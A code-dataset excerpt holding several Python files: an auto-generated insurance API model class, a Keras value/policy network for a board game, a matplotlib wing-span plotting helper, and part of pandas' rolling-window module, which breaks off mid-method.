ceb25b59075fc25d5f7f629dd0c227f75693ba99 | 2,661 | py | Python | easybimehlanding/models/insurance_companies.py | kmelodi/EasyBimehLanding_Python | b574a76a8805b306a423229b572c36dae0159def | ["MIT"] | null | null | null | easybimehlanding/models/insurance_companies.py | kmelodi/EasyBimehLanding_Python | b574a76a8805b306a423229b572c36dae0159def | ["MIT"] | null | null | null | easybimehlanding/models/insurance_companies.py | kmelodi/EasyBimehLanding_Python | b574a76a8805b306a423229b572c36dae0159def | ["MIT"] | null | null | null |
# -*- coding: utf-8 -*-
"""
easybimehlanding
This file was automatically generated by APIMATIC v2.0 ( https://apimatic.io ).
"""
import easybimehlanding.models.combo_data_model
class InsuranceCompanies(object):
"""Implementation of the 'InsuranceCompanies' model.
TODO: type model description here.
Attributes:
is_success (bool): TODO: type description here.
status (int): TODO: type description here.
message (list of ComboDataModel): TODO: type description here.
extra_data (string): TODO: type description here.
exception (string): TODO: type description here.
"""
# Create a mapping from Model property names to API property names
_names = {
"is_success":'isSuccess',
"status":'status',
"message":'message',
"extra_data":'extraData',
"exception":'exception'
}
def __init__(self,
is_success=None,
status=None,
message=None,
extra_data=None,
exception=None):
"""Constructor for the InsuranceCompanies class"""
# Initialize members of the class
self.is_success = is_success
self.status = status
self.message = message
self.extra_data = extra_data
self.exception = exception
@classmethod
def from_dictionary(cls,
dictionary):
"""Creates an instance of this model from a dictionary
Args:
dictionary (dictionary): A dictionary representation of the object as
obtained from the deserialization of the server's response. The keys
MUST match property names in the API description.
Returns:
object: An instance of this structure class.
"""
if dictionary is None:
return None
# Extract variables from the dictionary
is_success = dictionary.get('isSuccess')
status = dictionary.get('status')
message = None
if dictionary.get('message') != None:
message = list()
for structure in dictionary.get('message'):
message.append(easybimehlanding.models.combo_data_model.ComboDataModel.from_dictionary(structure))
extra_data = dictionary.get('extraData')
exception = dictionary.get('exception')
# Return an object of this model
return cls(is_success,
status,
message,
extra_data,
exception)
| 30.586207 | 115 | 0.579481 |
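A round-trip sketch for the model class above (the payload is hypothetical; key names follow the _names mapping, and the import path follows the file location):

from easybimehlanding.models.insurance_companies import InsuranceCompanies

payload = {
    "isSuccess": True,
    "status": 200,
    "message": [],        # would normally hold ComboDataModel dictionaries
    "extraData": None,
    "exception": None,
}
companies = InsuranceCompanies.from_dictionary(payload)
print(companies.is_success, companies.status)    # True 200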
ce2275e75339c595de7561a4a0163e3aac451139 | 8,516 | py | Python | src/backend/game/models.py | ToJestKrzysio/TheJungleGame | 904dd4adc937145df2c8c353eb83bec3b5dd1f7e | ["MIT"] | null | null | null | src/backend/game/models.py | ToJestKrzysio/TheJungleGame | 904dd4adc937145df2c8c353eb83bec3b5dd1f7e | ["MIT"] | null | null | null | src/backend/game/models.py | ToJestKrzysio/TheJungleGame | 904dd4adc937145df2c8c353eb83bec3b5dd1f7e | ["MIT"] | null | null | null |
import logging
import os
from abc import ABC, abstractmethod
from typing import Tuple, TYPE_CHECKING
import numpy as np
from tensorflow.keras import regularizers, optimizers, layers, Model
from tensorflow.keras.models import load_model
if TYPE_CHECKING:
from game import BoardTensor
class AbstractModel(ABC):
model: Model
name: str
def __init__(self, **kwargs):
self.name = ""
@abstractmethod
def predict(self, tensor: "BoardTensor", mask: np.array) -> Tuple[float, np.ndarray]:
pass
@abstractmethod
def set_name(self, name: str) -> None:
pass
@abstractmethod
def load(self, filename: str) -> None:
pass
@abstractmethod
def load_checkpoint(self, filepath: str) -> None:
pass
@abstractmethod
def save(self, filename: str) -> None:
pass
class ValuePolicyModel(AbstractModel):
def __init__(self, **kwargs):
super().__init__()
self.conv_kernel_reg = regularizers.l2(
kwargs.get("CONVOLUTIONAL_KERNEL_REGULARIZATION", 0.01))
self.conv_bias_reg = regularizers.l2(
kwargs.get("CONVOLUTIONAL_BIAS_REGULARIZATION", 0.01))
self.dense_kernel_reg = regularizers.l2(
kwargs.get("DENSE_KERNEL_REGULARIZATION", 0.01))
self.dense_bias_reg = regularizers.l2(
kwargs.get("DENSE_BIAS_REGULARIZATION", 0.01))
self.num_filters = kwargs.get("NUMBER_OF_FILTERS", 12)
self.policy_loss_weight = kwargs.get("POLICY_LOSS_WEIGHT", 0.01)
self.value_loss_weight = kwargs.get("VALUE_LOSS_WEIGHT", 0.01)
self.input_shape = (9, 7, 24)
self.output_shape = (9, 7, 8)
self.conv_blocks = kwargs.get("CONVOLUTIONAL_BLOCKS", 6)
self.model = self._create_model()
self.base_dir = kwargs.get("BASE_DIR", "data/models") # TODO unify save paths
self._cache = {}
def _create_model(self) -> Model:
model_input = layers.Input(shape=self.input_shape)
input_layer = model_input
for layer_id in range(self.conv_blocks):
input_layer = self._get_conv_block(input_layer, layer_id)
final_conv_layer = input_layer
policy_head = self._get_policy_head(final_conv_layer)
value_head = self._get_value_head(final_conv_layer)
model = Model(model_input, [value_head, policy_head])
model.compile(
loss={
"Policy_Head": "categorical_crossentropy",
"Value_Head": "mse"
},
loss_weights={
"Policy_Head": self.policy_loss_weight,
"Value_Head": self.value_loss_weight
},
optimizer=optimizers.Adam()
)
return model
def set_name(self, name: str) -> None:
self.name = name
def load(self, filename: int = -1) -> None:
self._cache.clear()
load_dir = os.path.join(self.base_dir, self.name)
if filename == -1:
filename = max(os.listdir(load_dir))
filepath = os.path.join(load_dir, str(filename))
self.model = load_model(filepath)
logging.info(f"Loaded karas model from '{filepath}'")
def load_checkpoint(self, filepath: str) -> None:
self._cache.clear()
self.model = load_model(filepath)
logging.info(f"Loaded karas checkpoint data from '{filepath}'")
def save(self, filename: str) -> None:
filepath = os.path.join(self.base_dir, self.name, filename)
self.model.save(filepath)
logging.info(f"Saved karas model to '{filepath}'")
def _get_conv_block(self, input_layer: layers.Layer, layer_id: int) -> layers.Layer:
conv_layer = layers.Conv2D(filters=self.num_filters, kernel_size=(3, 3), padding="same",
activation="relu", use_bias=True, data_format="channels_last",
kernel_regularizer=self.conv_kernel_reg,
bias_regularizer=self.conv_bias_reg,
name=f"Convolutional_Layer_{layer_id}")(input_layer)
batch_norm = layers.BatchNormalization(
axis=-1, name=f"Batch_Normalization_{layer_id}")(conv_layer)
return batch_norm
def _get_policy_head(self, input_layer: layers.Layer) -> layers.Layer:
conv_layer_1 = layers.Conv2D(
filters=self.num_filters, kernel_size=(3, 3), padding="same", activation="relu",
use_bias=True, data_format="channels_last", kernel_regularizer=self.conv_kernel_reg,
bias_regularizer=self.conv_bias_reg, name="Policy_Convolutional_Layer_1")(input_layer)
batch_norm_1 = layers.BatchNormalization(
axis=-1, name="Policy_Batch_Normalization_1")(conv_layer_1)
conv_layer_2 = layers.Conv2D(
filters=1, kernel_size=(1, 1), padding="same", activation="relu",
use_bias=True, data_format="channels_last", kernel_regularizer=self.conv_kernel_reg,
bias_regularizer=self.conv_bias_reg, name="Policy_Convolutional_Layer_2")(batch_norm_1)
batch_norm_2 = layers.BatchNormalization(
axis=-1, name="Policy_Batch_Normalization_2")(conv_layer_2)
flatten_layer = layers.Flatten(name="Policy_Flatten_Layer")(batch_norm_2)
output_layer = layers.Dense(
np.product(self.output_shape), activation='softmax', use_bias=True,
kernel_regularizer=self.dense_kernel_reg, bias_regularizer=self.dense_kernel_reg,
name='Policy_Head')(flatten_layer)
return output_layer
def _get_value_head(self, input_layer: layers.Layer) -> layers.Layer:
conv_layer = layers.Conv2D(
filters=1, kernel_size=(1, 1), padding="same", activation="relu", use_bias=True,
data_format="channels_last", kernel_regularizer=self.conv_kernel_reg,
bias_regularizer=self.conv_bias_reg, name="Value_Convolutional_Layer")(input_layer)
batch_norm_1 = layers.BatchNormalization(
axis=-1, name="Value_Batch_Normalization_1")(conv_layer)
flatten_layer = layers.Flatten(name="Value_Flatten_Layer")(batch_norm_1)
dense_layer = layers.Dense(
64, activation="relu", use_bias=True, kernel_regularizer=self.dense_kernel_reg,
bias_regularizer=self.dense_bias_reg, name="Value_Dense_Layer")(flatten_layer)
batch_norm_2 = layers.BatchNormalization(
axis=-1, name="Value_Batch_Normalization_2")(dense_layer)
output_layer = layers.Dense(
1, activation="tanh", use_bias=True, kernel_regularizer=self.dense_kernel_reg,
bias_regularizer=self.dense_bias_reg, name="Value_Head")(batch_norm_2)
return output_layer
def predict(self, tensor: "BoardTensor", mask: np.array) -> Tuple[float, np.ndarray]:
"""
        Given a tensor and a mask, executes the following algorithm.
1. Predict value (float) and policy (array 9x7x8) using NN provided with tensor.
2. Applies mask to remove invalid policies.
3. Normalizes masked array.
:param tensor: Array representing current and previous board states.
:param mask: Boolean array, 1's indicate valid moves and 0's invalid.
:return: Tuple of predicted [value, normalised_probabilities].
"""
if tensor.shape == self.input_shape:
tensor = np.expand_dims(tensor, axis=0)
value, policy = self._get_prediction(tensor)
value = value[0][0]
policy = policy.reshape(self.output_shape)
policy *= mask
policy = policy / np.sum(policy)
return value, policy
def _get_prediction(self, tensor) -> Tuple[float, np.ndarray]:
"""
Cached version of Keras.model.predict.
:param tensor: Array representing current and previous board states.
:return: Tuple of predicted [value, probabilities].
"""
tensor_key = tensor.data.tobytes()
if tensor_key not in self._cache:
self._cache[tensor_key] = self.model.predict(tensor)
if len(self._cache) > 2000:
key = next(iter(self._cache))
del self._cache[key]
return self._cache[tensor_key]
value_policy_model = ValuePolicyModel()
if __name__ == '__main__':
# RUN TO GENERATE NEW MODEL TO TRAIN ON
name = "first_model"
kwargs = {"BASE_DIR": "../data/models"}
model = ValuePolicyModel(**kwargs)
model.set_name(name)
model.save("0")
| 39.794393 | 99 | 0.65054 |
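A prediction sketch for ValuePolicyModel above, using the module-level value_policy_model instance (illustrative: the shapes come from self.input_shape == (9, 7, 24) and self.output_shape == (9, 7, 8), the import path is assumed from the file location, and an untrained network just returns arbitrary numbers):

import numpy as np
from game.models import value_policy_model

board_tensor = np.random.rand(9, 7, 24).astype(np.float32)   # current + previous board planes
move_mask = np.zeros((9, 7, 8))
move_mask[0, 0, 0] = 1                                       # pretend there is exactly one legal move
value, policy = value_policy_model.predict(board_tensor, move_mask)
print(value, policy.shape, policy.sum())                     # policy is re-normalised over legal moves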
4f0e039c6ccc21f620b90d34e94415dfb0bf1f6e | 808 | py | Python | fpa/post_process_operation.py | salamann/fpadesigner | ebb92eef5998b8dd0562f5374ae39a80647926e5 | ["MIT"] | null | null | null | fpa/post_process_operation.py | salamann/fpadesigner | ebb92eef5998b8dd0562f5374ae39a80647926e5 | ["MIT"] | null | null | null | fpa/post_process_operation.py | salamann/fpadesigner | ebb92eef5998b8dd0562f5374ae39a80647926e5 | ["MIT"] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import matplotlib.pyplot as plt
import os
def draw_spandirdata(yy, dL, clDist, circDist, ellipse, inducedAoa, planx, plany, dirname):
plt.figure(figsize=(12, 10))
plt.axis("equal")
plt.subplot(511)
plt.plot(yy, dL, label="dL")
plt.legend()
plt.subplot(512)
plt.plot(yy, clDist, label="dCL")
plt.legend()
plt.subplot(513)
plt.plot(yy, circDist, label="Gamma")
plt.plot(yy, ellipse, label="Ideal")
plt.legend()
plt.subplot(514)
plt.plot(yy, inducedAoa, label="Alpha_i")
plt.legend()
plt.subplot(515)
plt.plot(planx, plany, label="Planform")
plt.legend()
plt.xlabel("y [m]")
plt.legend()
plt.savefig(os.path.join("results", dirname, "span"))
if __name__ == '__main__':
pass
| 25.25 | 91 | 0.628713 |
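A minimal driver for draw_spandirdata above, with synthetic span-wise arrays (illustrative: the aerodynamic values are made up, and since the function saves to results/<dirname>/span, that directory is assumed to exist):

import numpy as np
from fpa.post_process_operation import draw_spandirdata

yy = np.linspace(0.0, 10.0, 50)                        # spanwise stations [m]
dL = np.sin(yy / 10 * np.pi)                           # sectional lift
clDist = 0.8 * np.ones_like(yy)                        # sectional lift coefficient
circDist = np.sqrt(np.clip(1 - (yy / 10) ** 2, 0, 1))  # circulation distribution
ellipse = circDist.copy()                              # ideal elliptic loading
inducedAoa = 0.01 * np.ones_like(yy)                   # induced angle of attack [rad]
planx, plany = yy, 0.5 * np.ones_like(yy)              # planform outline
draw_spandirdata(yy, dL, clDist, circDist, ellipse, inducedAoa, planx, plany, "demo_run")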
3e0e0b74a971bfa6ee5efbbf5253247fb48bb8ce | 70,929 | py | Python | pandas/core/window.py | ikoevska/pandas | 7169830040255c1073f99e2ee8817596a67b1cd5 | ["BSD-3-Clause"] | 1 | 2019-04-27T15:15:15.000Z | 2019-04-27T15:15:15.000Z | pandas/core/window.py | ikoevska/pandas | 7169830040255c1073f99e2ee8817596a67b1cd5 | ["BSD-3-Clause"] | null | null | null | pandas/core/window.py | ikoevska/pandas | 7169830040255c1073f99e2ee8817596a67b1cd5 | ["BSD-3-Clause"] | null | null | null |
"""
provide a generic structure to support window functions,
similar to how we have a Groupby object
"""
from __future__ import division
import warnings
import numpy as np
from collections import defaultdict
from datetime import timedelta
from pandas.core.dtypes.generic import (
ABCSeries,
ABCDataFrame,
ABCDatetimeIndex,
ABCTimedeltaIndex,
ABCPeriodIndex,
ABCDateOffset)
from pandas.core.dtypes.common import (
is_integer,
is_bool,
is_float_dtype,
is_integer_dtype,
needs_i8_conversion,
is_timedelta64_dtype,
is_list_like,
_ensure_float64,
is_scalar)
from pandas.core.base import (PandasObject, SelectionMixin,
GroupByMixin)
import pandas.core.common as com
import pandas._libs.window as _window
from pandas import compat
from pandas.compat.numpy import function as nv
from pandas.util._decorators import (Substitution, Appender,
cache_readonly)
from pandas.core.generic import _shared_docs
from textwrap import dedent
_shared_docs = dict(**_shared_docs)
_doc_template = """
Returns
-------
same type as input
See also
--------
pandas.Series.%(name)s
pandas.DataFrame.%(name)s
"""
class _Window(PandasObject, SelectionMixin):
_attributes = ['window', 'min_periods', 'center', 'win_type',
'axis', 'on', 'closed']
exclusions = set()
def __init__(self, obj, window=None, min_periods=None,
center=False, win_type=None, axis=0, on=None, closed=None,
**kwargs):
self.__dict__.update(kwargs)
self.blocks = []
self.obj = obj
self.on = on
self.closed = closed
self.window = window
self.min_periods = min_periods
self.center = center
self.win_type = win_type
self.win_freq = None
self.axis = obj._get_axis_number(axis) if axis is not None else None
self.validate()
@property
def _constructor(self):
return Window
@property
def is_datetimelike(self):
return None
@property
def _on(self):
return None
@property
def is_freq_type(self):
return self.win_type == 'freq'
def validate(self):
if self.center is not None and not is_bool(self.center):
raise ValueError("center must be a boolean")
if self.min_periods is not None and not \
is_integer(self.min_periods):
raise ValueError("min_periods must be an integer")
if self.closed is not None and self.closed not in \
['right', 'both', 'left', 'neither']:
raise ValueError("closed must be 'right', 'left', 'both' or "
"'neither'")
def _convert_freq(self):
""" resample according to the how, return a new object """
obj = self._selected_obj
index = None
return obj, index
def _create_blocks(self):
""" split data into blocks & return conformed data """
obj, index = self._convert_freq()
if index is not None:
index = self._on
# filter out the on from the object
if self.on is not None:
if obj.ndim == 2:
obj = obj.reindex(columns=obj.columns.difference([self.on]),
copy=False)
blocks = obj._to_dict_of_blocks(copy=False).values()
return blocks, obj, index
def _gotitem(self, key, ndim, subset=None):
"""
sub-classes to define
return a sliced object
Parameters
----------
key : string / list of selections
ndim : 1,2
requested ndim of result
subset : object, default None
subset to act on
"""
# create a new object to prevent aliasing
if subset is None:
subset = self.obj
self = self._shallow_copy(subset)
self._reset_cache()
if subset.ndim == 2:
if is_scalar(key) and key in subset or is_list_like(key):
self._selection = key
return self
def __getattr__(self, attr):
if attr in self._internal_names_set:
return object.__getattribute__(self, attr)
if attr in self.obj:
return self[attr]
raise AttributeError("%r object has no attribute %r" %
(type(self).__name__, attr))
def _dir_additions(self):
return self.obj._dir_additions()
def _get_window(self, other=None):
return self.window
@property
def _window_type(self):
return self.__class__.__name__
def __unicode__(self):
""" provide a nice str repr of our rolling object """
attrs = ["{k}={v}".format(k=k, v=getattr(self, k))
for k in self._attributes
if getattr(self, k, None) is not None]
return "{klass} [{attrs}]".format(klass=self._window_type,
attrs=','.join(attrs))
def _get_index(self, index=None):
"""
Return index as ndarrays
Returns
-------
tuple of (index, index_as_ndarray)
"""
if self.is_freq_type:
if index is None:
index = self._on
return index, index.asi8
return index, index
def _prep_values(self, values=None, kill_inf=True):
if values is None:
values = getattr(self._selected_obj, 'values', self._selected_obj)
# GH #12373 : rolling functions error on float32 data
# make sure the data is coerced to float64
if is_float_dtype(values.dtype):
values = _ensure_float64(values)
elif is_integer_dtype(values.dtype):
values = _ensure_float64(values)
elif needs_i8_conversion(values.dtype):
raise NotImplementedError("ops for {action} for this "
"dtype {dtype} are not "
"implemented".format(
action=self._window_type,
dtype=values.dtype))
else:
try:
values = _ensure_float64(values)
except (ValueError, TypeError):
raise TypeError("cannot handle this type -> {0}"
"".format(values.dtype))
if kill_inf:
values = values.copy()
values[np.isinf(values)] = np.NaN
return values
def _wrap_result(self, result, block=None, obj=None):
""" wrap a single result """
if obj is None:
obj = self._selected_obj
index = obj.index
if isinstance(result, np.ndarray):
# coerce if necessary
if block is not None:
if is_timedelta64_dtype(block.values.dtype):
from pandas import to_timedelta
result = to_timedelta(
result.ravel(), unit='ns').values.reshape(result.shape)
if result.ndim == 1:
from pandas import Series
return Series(result, index, name=obj.name)
return type(obj)(result, index=index, columns=block.columns)
return result
def _wrap_results(self, results, blocks, obj):
"""
wrap the results
Parameters
----------
results : list of ndarrays
blocks : list of blocks
obj : conformed data (may be resampled)
"""
from pandas import Series, concat
from pandas.core.index import _ensure_index
final = []
for result, block in zip(results, blocks):
result = self._wrap_result(result, block=block, obj=obj)
if result.ndim == 1:
return result
final.append(result)
# if we have an 'on' column
# we want to put it back into the results
# in the same location
columns = self._selected_obj.columns
if self.on is not None and not self._on.equals(obj.index):
name = self._on.name
final.append(Series(self._on, index=obj.index, name=name))
if self._selection is not None:
selection = _ensure_index(self._selection)
# need to reorder to include original location of
# the on column (if its not already there)
if name not in selection:
columns = self.obj.columns
indexer = columns.get_indexer(selection.tolist() + [name])
columns = columns.take(sorted(indexer))
if not len(final):
return obj.astype('float64')
return concat(final, axis=1).reindex(columns=columns, copy=False)
def _center_window(self, result, window):
""" center the result in the window """
if self.axis > result.ndim - 1:
raise ValueError("Requested axis is larger then no. of argument "
"dimensions")
offset = _offset(window, True)
if offset > 0:
if isinstance(result, (ABCSeries, ABCDataFrame)):
result = result.slice_shift(-offset, axis=self.axis)
else:
lead_indexer = [slice(None)] * result.ndim
lead_indexer[self.axis] = slice(offset, None)
result = np.copy(result[tuple(lead_indexer)])
return result
def aggregate(self, arg, *args, **kwargs):
result, how = self._aggregate(arg, *args, **kwargs)
if result is None:
return self.apply(arg, args=args, kwargs=kwargs)
return result
agg = aggregate
_shared_docs['sum'] = dedent("""
%(name)s sum""")
_shared_docs['mean'] = dedent("""
%(name)s mean""")
class Window(_Window):
"""
Provides rolling window calculations.
.. versionadded:: 0.18.0
Parameters
----------
window : int, or offset
Size of the moving window. This is the number of observations used for
calculating the statistic. Each window will be a fixed size.
If its an offset then this will be the time period of each window. Each
window will be a variable sized based on the observations included in
the time-period. This is only valid for datetimelike indexes. This is
new in 0.19.0
min_periods : int, default None
Minimum number of observations in window required to have a value
(otherwise result is NA). For a window that is specified by an offset,
this will default to 1.
center : boolean, default False
Set the labels at the center of the window.
win_type : string, default None
Provide a window type. If ``None``, all points are evenly weighted.
See the notes below for further information.
on : string, optional
For a DataFrame, column on which to calculate
the rolling window, rather than the index
closed : string, default None
Make the interval closed on the 'right', 'left', 'both' or
'neither' endpoints.
For offset-based windows, it defaults to 'right'.
For fixed windows, defaults to 'both'. Remaining cases not implemented
for fixed windows.
.. versionadded:: 0.20.0
axis : int or string, default 0
Returns
-------
a Window or Rolling sub-classed for the particular operation
Examples
--------
>>> df = pd.DataFrame({'B': [0, 1, 2, np.nan, 4]})
>>> df
B
0 0.0
1 1.0
2 2.0
3 NaN
4 4.0
Rolling sum with a window length of 2, using the 'triang'
window type.
>>> df.rolling(2, win_type='triang').sum()
B
0 NaN
1 1.0
2 2.5
3 NaN
4 NaN
Rolling sum with a window length of 2, min_periods defaults
to the window length.
>>> df.rolling(2).sum()
B
0 NaN
1 1.0
2 3.0
3 NaN
4 NaN
Same as above, but explicitly set the min_periods
>>> df.rolling(2, min_periods=1).sum()
B
0 0.0
1 1.0
2 3.0
3 2.0
4 4.0
A ragged (meaning not-a-regular frequency), time-indexed DataFrame
>>> df = pd.DataFrame({'B': [0, 1, 2, np.nan, 4]},
... index = [pd.Timestamp('20130101 09:00:00'),
... pd.Timestamp('20130101 09:00:02'),
... pd.Timestamp('20130101 09:00:03'),
... pd.Timestamp('20130101 09:00:05'),
... pd.Timestamp('20130101 09:00:06')])
>>> df
B
2013-01-01 09:00:00 0.0
2013-01-01 09:00:02 1.0
2013-01-01 09:00:03 2.0
2013-01-01 09:00:05 NaN
2013-01-01 09:00:06 4.0
Contrasting to an integer rolling window, this will roll a variable
length window corresponding to the time period.
The default for min_periods is 1.
>>> df.rolling('2s').sum()
B
2013-01-01 09:00:00 0.0
2013-01-01 09:00:02 1.0
2013-01-01 09:00:03 3.0
2013-01-01 09:00:05 NaN
2013-01-01 09:00:06 4.0
Notes
-----
By default, the result is set to the right edge of the window. This can be
changed to the center of the window by setting ``center=True``.
To learn more about the offsets & frequency strings, please see `this link
<http://pandas.pydata.org/pandas-docs/stable/timeseries.html#offset-aliases>`__.
The recognized win_types are:
* ``boxcar``
* ``triang``
* ``blackman``
* ``hamming``
* ``bartlett``
* ``parzen``
* ``bohman``
* ``blackmanharris``
* ``nuttall``
* ``barthann``
* ``kaiser`` (needs beta)
* ``gaussian`` (needs std)
* ``general_gaussian`` (needs power, width)
* ``slepian`` (needs width).
If ``win_type=None`` all points are evenly weighted. To learn more about
different window types see `scipy.signal window functions
<https://docs.scipy.org/doc/scipy/reference/signal.html#window-functions>`__.
See Also
--------
expanding : Provides expanding transformations.
ewm : Provides exponential weighted functions
"""
def validate(self):
super(Window, self).validate()
window = self.window
if isinstance(window, (list, tuple, np.ndarray)):
pass
elif is_integer(window):
if window < 0:
raise ValueError("window must be non-negative")
try:
import scipy.signal as sig
except ImportError:
raise ImportError('Please install scipy to generate window '
'weight')
if not isinstance(self.win_type, compat.string_types):
raise ValueError('Invalid win_type {0}'.format(self.win_type))
if getattr(sig, self.win_type, None) is None:
raise ValueError('Invalid win_type {0}'.format(self.win_type))
else:
raise ValueError('Invalid window {0}'.format(window))
def _prep_window(self, **kwargs):
"""
provide validation for our window type, return the window
we have already been validated
"""
window = self._get_window()
if isinstance(window, (list, tuple, np.ndarray)):
return com._asarray_tuplesafe(window).astype(float)
elif is_integer(window):
import scipy.signal as sig
# the below may pop from kwargs
def _validate_win_type(win_type, kwargs):
arg_map = {'kaiser': ['beta'],
'gaussian': ['std'],
'general_gaussian': ['power', 'width'],
'slepian': ['width']}
if win_type in arg_map:
return tuple([win_type] + _pop_args(win_type,
arg_map[win_type],
kwargs))
return win_type
def _pop_args(win_type, arg_names, kwargs):
msg = '%s window requires %%s' % win_type
all_args = []
for n in arg_names:
if n not in kwargs:
raise ValueError(msg % n)
all_args.append(kwargs.pop(n))
return all_args
win_type = _validate_win_type(self.win_type, kwargs)
# GH #15662. `False` makes symmetric window, rather than periodic.
return sig.get_window(win_type, window, False).astype(float)
def _apply_window(self, mean=True, **kwargs):
"""
Applies a moving window of type ``window_type`` on the data.
Parameters
----------
mean : boolean, default True
If True computes weighted mean, else weighted sum
Returns
-------
y : type of input argument
"""
window = self._prep_window(**kwargs)
center = self.center
blocks, obj, index = self._create_blocks()
results = []
for b in blocks:
try:
values = self._prep_values(b.values)
except TypeError:
results.append(b.values.copy())
continue
if values.size == 0:
results.append(values.copy())
continue
offset = _offset(window, center)
additional_nans = np.array([np.NaN] * offset)
def f(arg, *args, **kwargs):
minp = _use_window(self.min_periods, len(window))
return _window.roll_window(np.concatenate((arg,
additional_nans))
if center else arg, window, minp,
avg=mean)
result = np.apply_along_axis(f, self.axis, values)
if center:
result = self._center_window(result, window)
results.append(result)
return self._wrap_results(results, blocks, obj)
_agg_doc = dedent("""
Examples
--------
>>> df = pd.DataFrame(np.random.randn(10, 3), columns=['A', 'B', 'C'])
>>> df
A B C
0 -2.385977 -0.102758 0.438822
1 -1.004295 0.905829 -0.954544
2 0.735167 -0.165272 -1.619346
3 -0.702657 -1.340923 -0.706334
4 -0.246845 0.211596 -0.901819
5 2.463718 3.157577 -1.380906
6 -1.142255 2.340594 -0.039875
7 1.396598 -1.647453 1.677227
8 -0.543425 1.761277 -0.220481
9 -0.640505 0.289374 -1.550670
>>> df.rolling(3, win_type='boxcar').agg('mean')
A B C
0 NaN NaN NaN
1 NaN NaN NaN
2 -0.885035 0.212600 -0.711689
3 -0.323928 -0.200122 -1.093408
4 -0.071445 -0.431533 -1.075833
5 0.504739 0.676083 -0.996353
6 0.358206 1.903256 -0.774200
7 0.906020 1.283573 0.085482
8 -0.096361 0.818139 0.472290
9 0.070889 0.134399 -0.031308
See also
--------
pandas.DataFrame.rolling.aggregate
pandas.DataFrame.aggregate
""")
@Appender(_agg_doc)
@Appender(_shared_docs['aggregate'] % dict(
versionadded='',
klass='Series/DataFrame'))
def aggregate(self, arg, *args, **kwargs):
result, how = self._aggregate(arg, *args, **kwargs)
if result is None:
# these must apply directly
result = arg(self)
return result
agg = aggregate
@Substitution(name='window')
@Appender(_doc_template)
@Appender(_shared_docs['sum'])
def sum(self, *args, **kwargs):
nv.validate_window_func('sum', args, kwargs)
return self._apply_window(mean=False, **kwargs)
@Substitution(name='window')
@Appender(_doc_template)
@Appender(_shared_docs['mean'])
def mean(self, *args, **kwargs):
nv.validate_window_func('mean', args, kwargs)
return self._apply_window(mean=True, **kwargs)
class _GroupByMixin(GroupByMixin):
""" provide the groupby facilities """
def __init__(self, obj, *args, **kwargs):
parent = kwargs.pop('parent', None) # noqa
groupby = kwargs.pop('groupby', None)
if groupby is None:
groupby, obj = obj, obj.obj
self._groupby = groupby
self._groupby.mutated = True
self._groupby.grouper.mutated = True
super(GroupByMixin, self).__init__(obj, *args, **kwargs)
count = GroupByMixin._dispatch('count')
corr = GroupByMixin._dispatch('corr', other=None, pairwise=None)
cov = GroupByMixin._dispatch('cov', other=None, pairwise=None)
def _apply(self, func, name, window=None, center=None,
check_minp=None, **kwargs):
"""
dispatch to apply; we are stripping all of the _apply kwargs and
performing the original function call on the grouped object
"""
def f(x, name=name, *args):
x = self._shallow_copy(x)
if isinstance(name, compat.string_types):
return getattr(x, name)(*args, **kwargs)
return x.apply(name, *args, **kwargs)
return self._groupby.apply(f)
class _Rolling(_Window):
@property
def _constructor(self):
return Rolling
def _apply(self, func, name=None, window=None, center=None,
check_minp=None, **kwargs):
"""
Rolling statistical measure using supplied function. Designed to be
used with passed-in Cython array-based functions.
Parameters
----------
func : string/callable to apply
name : string, optional
name of this function
window : int/array, default to _get_window()
center : boolean, default to self.center
check_minp : function, default to _use_window
Returns
-------
y : type of input
"""
if center is None:
center = self.center
if window is None:
window = self._get_window()
if check_minp is None:
check_minp = _use_window
blocks, obj, index = self._create_blocks()
index, indexi = self._get_index(index=index)
results = []
for b in blocks:
try:
values = self._prep_values(b.values)
except TypeError:
results.append(b.values.copy())
continue
if values.size == 0:
results.append(values.copy())
continue
# if we have a string function name, wrap it
if isinstance(func, compat.string_types):
cfunc = getattr(_window, func, None)
if cfunc is None:
raise ValueError("we do not support this function "
"in _window.{0}".format(func))
def func(arg, window, min_periods=None, closed=None):
minp = check_minp(min_periods, window)
# ensure we are only rolling on floats
arg = _ensure_float64(arg)
return cfunc(arg,
window, minp, indexi, closed, **kwargs)
# calculation function
if center:
offset = _offset(window, center)
additional_nans = np.array([np.NaN] * offset)
def calc(x):
return func(np.concatenate((x, additional_nans)),
window, min_periods=self.min_periods,
closed=self.closed)
else:
def calc(x):
return func(x, window, min_periods=self.min_periods,
closed=self.closed)
with np.errstate(all='ignore'):
if values.ndim > 1:
result = np.apply_along_axis(calc, self.axis, values)
else:
result = calc(values)
if center:
result = self._center_window(result, window)
results.append(result)
return self._wrap_results(results, blocks, obj)
class _Rolling_and_Expanding(_Rolling):
    _shared_docs['count'] = """%(name)s count of non-NaN observations
        inside the provided window."""
def count(self):
blocks, obj, index = self._create_blocks()
index, indexi = self._get_index(index=index)
window = self._get_window()
window = min(window, len(obj)) if not self.center else window
results = []
for b in blocks:
result = b.notna().astype(int)
result = self._constructor(result, window=window, min_periods=0,
center=self.center,
closed=self.closed).sum()
results.append(result)
return self._wrap_results(results, blocks, obj)
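    # Illustrative sketch (hand-checked example, not part of pandas): the shared
    # 'count' doc above can be verified directly. pd.Series([1.0, np.nan, 3.0])
    # .rolling(2).count() returns [1.0, 1.0, 1.0]: the windows are [1.0],
    # [1.0, nan] and [nan, 3.0], and each reports its number of non-NaN points,
    # which is why min_periods=0 is forced in the implementation above.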
_shared_docs['apply'] = dedent(r"""
%(name)s function apply
Parameters
----------
func : function
Must produce a single value from an ndarray input
\*args and \*\*kwargs are passed to the function""")
def apply(self, func, args=(), kwargs={}):
# TODO: _level is unused?
_level = kwargs.pop('_level', None) # noqa
window = self._get_window()
offset = _offset(window, self.center)
index, indexi = self._get_index()
def f(arg, window, min_periods, closed):
minp = _use_window(min_periods, window)
return _window.roll_generic(arg, window, minp, indexi, closed,
offset, func, args, kwargs)
return self._apply(f, func, args=args, kwargs=kwargs,
center=False)
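    # Illustrative sketch (not part of pandas): a typical use of the generic
    # apply above is a window-wise range,
    #   >>> pd.Series([1, 3, 2, 5]).rolling(3).apply(lambda x: x.max() - x.min())
    # which yields [NaN, NaN, 2.0, 3.0]; `x` arrives as an ndarray of window values.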
def sum(self, *args, **kwargs):
nv.validate_window_func('sum', args, kwargs)
return self._apply('roll_sum', 'sum', **kwargs)
_shared_docs['max'] = dedent("""
%(name)s maximum
""")
def max(self, *args, **kwargs):
nv.validate_window_func('max', args, kwargs)
